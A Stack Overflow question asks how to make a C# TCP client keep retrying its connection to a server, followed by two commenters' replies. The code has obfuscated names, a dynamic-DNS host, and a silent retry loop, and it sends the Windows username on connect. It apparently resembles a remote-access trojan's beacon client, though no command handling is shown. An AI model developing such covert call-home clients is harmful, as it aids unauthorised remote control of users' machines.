# C# Reconnect Client to Server

Tags: c#, reconnect

I've been trying for several days to make the client detect it when the server connection is closed and make a loop of connection attempts until it detects the available connection (open the server) and when I try closing the connection with Client.Close and shutdown (shutdown.both) stops the application

thank you if you could help me that I'm not correcting mistakes or solving the code

```
 [DllImport("winmm.dll", EntryPoint = "mciSendStringA")]
    public static extern void mciSendStringA(string comandonow, string retornonow, long longitudnow, long callbacknow);

    public static TcpClient QKICDdjIKo = new TcpClient();
    static IPEndPoint MjDHEHn = null;
    static IPHostEntry hostEntry;
    static List<TcpClient> countConnections = new List<TcpClient>();
    static StreamReader reader;
    private static byte[] _readBuffer;
    private static byte[] _tempHeader;
    public static bool Connected { get; private set; }
    public static bool Exiting { get; private set; }
    //

    public static int BUFFER_SIZE { get { return 1024 * 16; } } // 16KB
    public static int HEADER_SIZE { get { return 4; } } // 4B
    private static bool IsConnectionSuccessful = false;
    private static ManualResetEvent TimeoutObject = new ManualResetEvent(false);
    private static Exception socketexception;
    public static bool isconnected;


 public static void Connection()
    {

        TimeoutObject.Reset();
        socketexception = null;
        try
        {

            if (!QKICDdjIKo.Connected)
            {
                _readBuffer = new byte[BUFFER_SIZE];
                _tempHeader = new byte[HEADER_SIZE];
                hostEntry = Dns.GetHostEntry("noip host");
                var ip = hostEntry.AddressList[0];
                MjDHEHn = new IPEndPoint(IPAddress.Parse(ip.ToString()), 4004);
                QKICDdjIKo.Connect(MjDHEHn); // Option 1
                // QKICDdjIKo.BeginConnect("127.0.0.1", 4004, new AsyncCallback(khmcbmPmGPCfIOcPKOBONAbnGnfFIJnpREd), QKICDdjIKo);  //Option 2
                OperatingSystem os_info = Environment.OSVersion;
                ConnectedVerify(Environment.UserName.ToString());
                QKICDdjIKo.GetStream().BeginRead(_readBuffer, 0, _readBuffer.Length, ReadMSG, 0);


            }

        }
        catch (Exception ex)
        {
            MessageBox.Show(ex.Message);
        }
    }
private static void CallBackMethod(IAsyncResult asyncresult)
    {
        try
        {
            IsConnectionSuccessful = false;
            TcpClient tcpclient = asyncresult.AsyncState as TcpClient;

            if (tcpclient.Client != null)
            {
                tcpclient.EndConnect(asyncresult);
                IsConnectionSuccessful = true;
            }
        }
        catch (Exception ex)
        {
            IsConnectionSuccessful = false;
            socketexception = ex;
        }
        finally
        {
            TimeoutObject.Set();
        }
    }
public Form1()
    {
        InitializeComponent();
        Connect();
    }
 public static void Connect()
    {
        while (!Exiting) // Main Connect Loop
        {
            if (!Connected)
            {
                Thread.Sleep(100 + new Random().Next(0, 250));
                Connection();
                Thread.Sleep(200);

                Application.DoEvents();
            }
            while (Connected) // hold client open
            {
                Application.DoEvents();
                Thread.Sleep(2500);
            }
            if (Exiting)
            {
                //QKICDdjIKo.Close();
                return;
            }
            Thread.Sleep(3000 + new Random().Next(250, 750));
        }
    }
public static void ReadMSG(IAsyncResult now)
    {
        try
        {
            while (true)
            {
                reader = new StreamReader(QKICDdjIKo.GetStream());
                Rd(reader.ReadLine());
                QKICDdjIKo.GetStream().BeginRead(_readBuffer, 0, _readBuffer.Length, ReadMSG, 0);
            }

        }
        catch
        {


        }
    }
public static void HjoLNkEHFaqQCp(string texto)
    {
        try
        {
            StreamWriter DpBoDcECG = new StreamWriter(QKICDdjIKo.GetStream());

            DpBoDcECG.WriteLine(texto);
            DpBoDcECG.Flush();
        }
        catch
        {
            //
        }
    }
 public static void Rd(string msg)
    {

    }
static void Status(string msg)
    {
        try
        {
            StreamWriter writer = new StreamWriter(QKICDdjIKo.GetStream());
            writer.WriteLine("STATUS|" + msg);
            writer.Flush();
        }
        catch
        {

        }
    }
static void ConnectedVerify(string msg)
    {
        StreamWriter writer = new StreamWriter(QKICDdjIKo.GetStream());
        writer.WriteLine("CONNECTED|" + msg);
        writer.Flush();
    }
static void usr(string msg)
    {
        StreamWriter writer = new StreamWriter(QKICDdjIKo.GetStream());
        writer.WriteLine("USER|" + msg);
        writer.Flush();
    }
```

Comment: Unrelated tip: `StreamReader` and `StreamWriter` are IDisposable so each should be in a `using` block.

Comment: Welcome to Stack Overflow. Plese describe in more detail, what is expected behaviour of your application and how is it different from actual behaviour. Your question does not contain any question(s) and it is not obvious, what exactly you have problem with. Also those cryptic names (such as `HjoLNkEHFaqQCp`) and superfluous code that is not called from anywhere (such as `CallBackMethod`) does not make it any easier to help you. See [how to ask](https://stackoverflow.com/help/how-to-ask) and try to improve your question.